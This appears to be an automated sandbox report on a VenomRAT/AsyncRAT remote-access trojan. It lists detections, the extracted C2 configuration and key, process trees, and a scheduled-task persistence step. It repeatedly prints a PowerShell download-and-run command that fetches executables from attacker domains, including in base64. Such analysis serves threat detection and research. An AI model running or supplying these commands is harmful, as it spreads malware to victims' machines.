Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ZzOTKK2V8l.exe", ParentImage: C:\Users\user\Desktop\ZzOTKK2V8l.exe, ParentProcessId: 6368, ParentProcessName: ZzOTKK2V8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ProcessId: 6516, ProcessName: cmd.exe

Snort IDS alert:
Timestamp: 05/26/24-09:46:59.108809
SID: 2052265
Source Port: 4449
Destination Port: 49704
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: ZzOTKK2V8l.exe; Avira: detected
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe; Avira: detection malicious, Label: HEUR/AGEN.1313069
Source: ZzOTKK2V8l.exe; Malware Configuration Extractor: VenomRAT {"Server": "94.156.65.172", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "AntiMalware.exe", "AES_key": "jJXnCe880wpEw5c4UGtj4RyhmqzVM1cb", "Mutex": "izslwuidilziewad", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "kqqmqcHW+lrfDFUM+L+OdEMYusuLLkWntK3q1MWb1AnedZMdr2oAlXEGkreKRl0JNVwhdGMQgoNPJLnKDu9Nux3mwulmhQchyeUxqfxX5H8M87MqPLcXnKblAMoa8m+VyRGCVFn59iBwizEj16DMiLuv1h27Dkx3yjZaVlktefI=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}
Source: ZzOTKK2V8l.exe; Malware Configuration Extractor: AsyncRAT {"Ports": ["4449"], "Server": ["94.156.65.172"], "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "Server Signature": "kqqmqcHW+lrfDFUM+L+OdEMYusuLLkWntK3q1MWb1AnedZMdr2oAlXEGkreKRl0JNVwhdGMQgoNPJLnKDu9Nux3mwulmhQchyeUxqfxX5H8M87MqPLcXnKblAMoa8m+VyRGCVFn59iBwizEj16DMiLuv1h27Dkx3yjZaVlktefI="}
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe; ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe; Virustotal: Detection: 55%
Source: ZzOTKK2V8l.exe; ReversingLabs: Detection: 50%
Source: ZzOTKK2V8l.exe; Virustotal: Detection: 55%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe; Joe Sandbox ML: detected
Source: ZzOTKK2V8l.exe; Joe Sandbox ML: detected
Source: ZzOTKK2V8l.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Networking

                            Source: TrafficSnort IDS: 2052265 ET TROJAN Observed Malicious SSL Cert (VenomRAT) 94.156.65.172:4449 -> 192.168.2.5:49704
                            Source: global trafficTCP traffic: 192.168.2.5:49704 -> 94.156.65.172:4449
                            Source: Joe Sandbox ViewASN Name: TERASYST-ASBG TERASYST-ASBG
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: global trafficDNS traffic detected: DNS query: xcu.exgaming.click
                            Source: global trafficDNS traffic detected: DNS query: xcu5.exgaming.click
                            Source: AntiMalware.exe, 00000012.00000002.4422664162.000000000103B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                            Source: AntiMalware.exe, 00000012.00000002.4422664162.000000000103B000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.18.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                            Source: AntiMalware.exe, 00000012.00000002.4432828798.000000001C379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabi
                            Source: ZzOTKK2V8l.exe, 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.0000000003651000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.0000000003B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            Source: Yara matchFile source: ZzOTKK2V8l.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.2.ZzOTKK2V8l.exe.36ea760.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.ZzOTKK2V8l.exe.600000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPED
                            Source: Yara matchFile source: 0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ZzOTKK2V8l.exe PID: 6368, type: MEMORYSTR
                            Source: ZzOTKK2V8l.exe, Keylogger.cs.Net Code: KeyboardLayout
                            Source: AntiMalware.exe.0.dr, Keylogger.cs.Net Code: KeyboardLayout

                            System Summary

                            Source: ZzOTKK2V8l.exe, type: SAMPLEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.2.ZzOTKK2V8l.exe.36ea760.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.0.ZzOTKK2V8l.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeCode function: 0_2_00007FF848F43DCE NtProtectVirtualMemory,0_2_00007FF848F43DCE
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 13_2_00007FF848F33E3E NtProtectVirtualMemory,13_2_00007FF848F33E3E
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F13E3E NtProtectVirtualMemory,18_2_00007FF848F13E3E
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeCode function: 0_2_00007FF848F43DCE0_2_00007FF848F43DCE
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeCode function: 0_2_00007FF848F436DD0_2_00007FF848F436DD
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 13_2_00007FF848F33E3E13_2_00007FF848F33E3E
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 13_2_00007FF848F3374D13_2_00007FF848F3374D
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F13E3E18_2_00007FF848F13E3E
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F1B1E218_2_00007FF848F1B1E2
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F1A43618_2_00007FF848F1A436
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F1EF4D18_2_00007FF848F1EF4D
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F1FBDF18_2_00007FF848F1FBDF
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F1812D18_2_00007FF848F1812D
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F19F3918_2_00007FF848F19F39
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F1374D18_2_00007FF848F1374D
                            Source: ZzOTKK2V8l.exeStatic PE information: No import functions for PE file found
                            Source: AntiMalware.exe.0.drStatic PE information: No import functions for PE file found
                            Source: ZzOTKK2V8l.exe, 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameClientx64.exe" vs ZzOTKK2V8l.exe
                            Source: ZzOTKK2V8l.exe, 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClientx64.exe" vs ZzOTKK2V8l.exe
                            Source: ZzOTKK2V8l.exeBinary or memory string: OriginalFilenameClientx64.exe" vs ZzOTKK2V8l.exe
                            Source: ZzOTKK2V8l.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.2.ZzOTKK2V8l.exe.36ea760.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.0.ZzOTKK2V8l.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: ZzOTKK2V8l.exe, Program.csBase64 encoded string: 'L2MgcG93ZXJzaGVsbCAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8veGN1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwSW9yZXIuZXhlJykgJiBwb3dlcnNoZWxsIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly94Y3U1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwbElvcmVyLmV4ZScpICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBJb3Jlci5leGUnICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBsSW9yZXIuZXhlJyAmIGV4aXQ='
                            Source: ZzOTKK2V8l.exe, Settings.csBase64 encoded string: 'jXkAxQKdxWdKf6MulZtlNYU6T4qEdxLMPLu5+y70FwxaPzWHBOZsjaBJqdi8N/R7QrkuvKKrnqzxiMRLwavn3Q==', 'ozEtu3hRDvdntQ14K2rVsFw+W+1ePWsKMq82RBY/lS5QZlGsUkLLNq6N4B85bGE4caoqd/pKC2NTiNKftn85/w==', 'lJWcKE/WisnnPmk/afSaGnNNWfh3Z1YjCbaMyzuNbOE+WU7HqgcR1+ArYpqJRCnepG1be7lg2FIqcKZYCej1yMmak+W9vHZrWTyH9wbaX3JiSbBxIrmOeyHtSIOmoUc1', 'y/3x+hsSnm+9ccbUAPkqO4rO8Ux4onUjfKbe0vO0M8YdZNCXg74/pUCReRIf5KErux32JKbTqEuKL6x1UM4q9g==', 'PcwdjTKFAMgG3RHtaI7nTq63q8Eo8JQXLND55HmnBxDj7yCNlO/tUriInA85OeRIhQX6AJLdBKvLVtbRZKanDwGvA/WyTk/9TuqreAY49jM=', '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', 'KiKGTpI4rxj6QQT4E4kJI+SnHTdj1UbcJmKNvHjX6/DBF5p7yJFVfH4I9rkp7syoYn0OxqslJ86j9Abh7e7AhA==', 'vbGJqivXh6TY//32e3NkAMsK3inu7RLf9cK35T1C/AkMmT/TUmcHpChY9BLfk3lm2ySPPE2tirk820n/Furu8w==', 'qo/SK2p+f/Zfm9FtCYaV5XME0G3kCCAfriHdDkUi5OOlp5Cb7AN6CJsVHGFTdrhSAj5VDDwIGV+NEtnIkznSXA==', 'l7knJCzKqw68RMnowgrOjgqCjO54idsEdj2eVkR1Cn8iMS8wSYPjDI68uHet/iIWFCCjtVs15M5kVusbV3iyLw=='
                            Source: AntiMalware.exe.0.dr, Program.csBase64 encoded string: 'L2MgcG93ZXJzaGVsbCAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8veGN1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwSW9yZXIuZXhlJykgJiBwb3dlcnNoZWxsIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly94Y3U1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwbElvcmVyLmV4ZScpICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBJb3Jlci5leGUnICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBsSW9yZXIuZXhlJyAmIGV4aXQ='
                            Source: AntiMalware.exe.0.dr, Settings.csBase64 encoded string: 'jXkAxQKdxWdKf6MulZtlNYU6T4qEdxLMPLu5+y70FwxaPzWHBOZsjaBJqdi8N/R7QrkuvKKrnqzxiMRLwavn3Q==', 'ozEtu3hRDvdntQ14K2rVsFw+W+1ePWsKMq82RBY/lS5QZlGsUkLLNq6N4B85bGE4caoqd/pKC2NTiNKftn85/w==', 'lJWcKE/WisnnPmk/afSaGnNNWfh3Z1YjCbaMyzuNbOE+WU7HqgcR1+ArYpqJRCnepG1be7lg2FIqcKZYCej1yMmak+W9vHZrWTyH9wbaX3JiSbBxIrmOeyHtSIOmoUc1', 'y/3x+hsSnm+9ccbUAPkqO4rO8Ux4onUjfKbe0vO0M8YdZNCXg74/pUCReRIf5KErux32JKbTqEuKL6x1UM4q9g==', 'PcwdjTKFAMgG3RHtaI7nTq63q8Eo8JQXLND55HmnBxDj7yCNlO/tUriInA85OeRIhQX6AJLdBKvLVtbRZKanDwGvA/WyTk/9TuqreAY49jM=', 'XDXpkYhRS8WGYilk/4IwGqgzIW11grYJw7JapruAB0xrqC6zbbRDY7NHOxwXP6zyR2jqXaTgLCmIXQJ46iLAWlDB/egix4ythub7pRzZagwovoc96IeBfhPbXB7ZDAjTudVyp5KzXzNEJPyNwRRaqe5hY7OuL8chiYEU5i9QS8mafScnga6mHFJ88BeNqyizx1wkkCUr79P0eVi5U4hr1Zww1JYUYdJvzoTCyQ99BZHPd4ihZ9kmvVnlwSPsvMD+Wa+uWhyGUb7TdQElgF33aOli+SCVoCY8VOjbwbo82c0ZggzMI5flBv31eHJLFM4xm1xsHN4gFgtK0d3U04OS/mH9d0wPWsPkcoX6tgsPPt/XhcjNHFUx2Q21w2fYK4fehfY+9Zysw2vF7cGN1CbkJ/E1wPxUtjovRcNfwC3owD25sYiZpz42G4rRx04xlM+FniB+z4UApadENJuDmJjKJU7RPD29eDSsgRdUEhGj4ISu7BH7ne08/RsPjOSKVNRtdLn08+gEZTxAV7ldzVtt9lHMXDcMsLxdcNrvWgdth7fCUO+caJQMG67RS7nFdh9woxNrnsL6QCv3DgAdanvn0+2+Hw6/IG+aEJZjoJfzpbNoCLSZ6dGJCXbtwN0/LGKzgdi4HlTQxqqDWKOoKC3eWypqoj/dU8VSNnQgvR9VKXscsADepAZN39+Hh3k1RZqwNqtFKD0C9jR67YeIItM3zZVxgdH7aQfL2wL/woUFccfr580vtt3b3bAd4uYxvQJRmucI6gnBOm12vso6IhxXiHP3QnoQp5SKaTOIvyfTAtC6qEy22uzLSD1YI8nXWapaqoPf9UcGHTBo5jQLUfsakL3zp6LtWFjd6+Gax35w06GtNb7YxJmuurxp+HNQukAcrEdxcsWy46FxahqwT1txNMIb3DaIv9AzvrYwJZ9kQWQ5DBTlEYJE2qhjcy5Qx09upxM/FN6VqzPJcT7jTBAWE6qsBHrVdvj2EDPKdpXQD/Me5Mudu7qtK9hlXnQHDM7GYXKygtfjN3gzJcZ0dQG5G/0vGeuUaLkP+H8TetwxOIhtq09lhHeuM8YFWt25yDZ+', 'KiKGTpI4rxj6QQT4E4kJI+SnHTdj1UbcJmKNvHjX6/DBF5p7yJFVfH4I9rkp7syoYn0OxqslJ86j9Abh7e7AhA==', 'vbGJqivXh6TY//32e3NkAMsK3inu7RLf9cK35T1C/AkMmT/TUmcHpChY9BLfk3lm2ySPPE2tirk820n/Furu8w==', 'qo/SK2p+f/Zfm9FtCYaV5XME0G3kCCAfriHdDkUi5OOlp5Cb7AN6CJsVHGFTdrhSAj5VDDwIGV+NEtnIkznSXA==', 
'l7knJCzKqw68RMnowgrOjgqCjO54idsEdj2eVkR1Cn8iMS8wSYPjDI68uHet/iIWFCCjtVs15M5kVusbV3iyLw=='
                            Source: ZzOTKK2V8l.exe, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: ZzOTKK2V8l.exe, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: AntiMalware.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: AntiMalware.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@48/33@4/1
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeFile created: C:\Users\user\AppData\Roaming\MyData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeMutant created: \Sessions\1\BaseNamedObjects\izslwuidilziewad
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeFile created: C:\Users\user\AppData\Local\Temp\tmp124D.tmp
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat""
                            Source: ZzOTKK2V8l.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ZzOTKK2V8l.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeFile read: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: ZzOTKK2V8l.exeReversingLabs: Detection: 50%
                            Source: ZzOTKK2V8l.exeVirustotal: Detection: 55%
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeFile read: C:\Users\user\Desktop\ZzOTKK2V8l.exe
                            Source: unknownProcess created: C:\Users\user\Desktop\ZzOTKK2V8l.exe "C:\Users\user\Desktop\ZzOTKK2V8l.exe"
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat""
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\AntiMalware.exe C:\Users\user\AppData\Roaming\AntiMalware.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\AntiMalware.exe "C:\Users\user\AppData\Roaming\AntiMalware.exe"
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
